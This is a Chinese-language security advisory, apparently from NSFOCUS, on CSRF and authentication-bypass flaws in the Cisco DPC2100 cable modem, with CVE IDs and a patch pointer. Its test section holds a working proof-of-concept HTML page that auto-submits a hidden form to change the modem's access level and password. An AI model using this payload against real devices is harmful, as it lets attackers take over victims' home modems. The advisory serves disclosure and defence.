安全研究

安全漏洞
Cisco DPC2100调试解调器绕过认证和跨站请求伪造漏洞

发布日期:2010-05-24
更新日期:2010-05-25

受影响系统:
Cisco DPC2100 R2 v2.0.2r1256-060303
不受影响系统:
Cisco DPC2100 R2 v2.0.2r1256-100324as
描述:
BUGTRAQ  ID: 40346
CVE(CAN) ID: CVE-2010-2025,CVE-2010-2026,CVE-2010-2082

Cisco DPC2100是一款小型的有线调制解调器。

DPC2100猫的Web界面所提供的多个功能中存在跨站请求伪造漏洞,已登录用户受骗访问了恶意网页就会导致代码该用户执行各种非授权操作,包括重置设备、更改默认的管理口令或窃取敏感信息。此外在执行某些需要认证的操作时没有正确的检查DPC2100猫的访问控制方案,远程用户可以通过直接提交POST请求绕过认证。

<*来源:Dan Rosenberg
  
  链接:http://marc.info/?l=full-disclosure&m=127472232824525&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<title>Test for CSRF vulnerability in WebSTAR modems</title>
</head>

<body>

<form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl">
<input type="hidden" name="SAAccessLevel" value="0">
<input type="hidden" name="SAPassword" value="W2402">
</form>

<script>document.csrf.submit()</script>

</body>
</html>

建议:
厂商补丁:

Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cisco.com/warp/public/707/advisory.html

浏览次数:2546
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障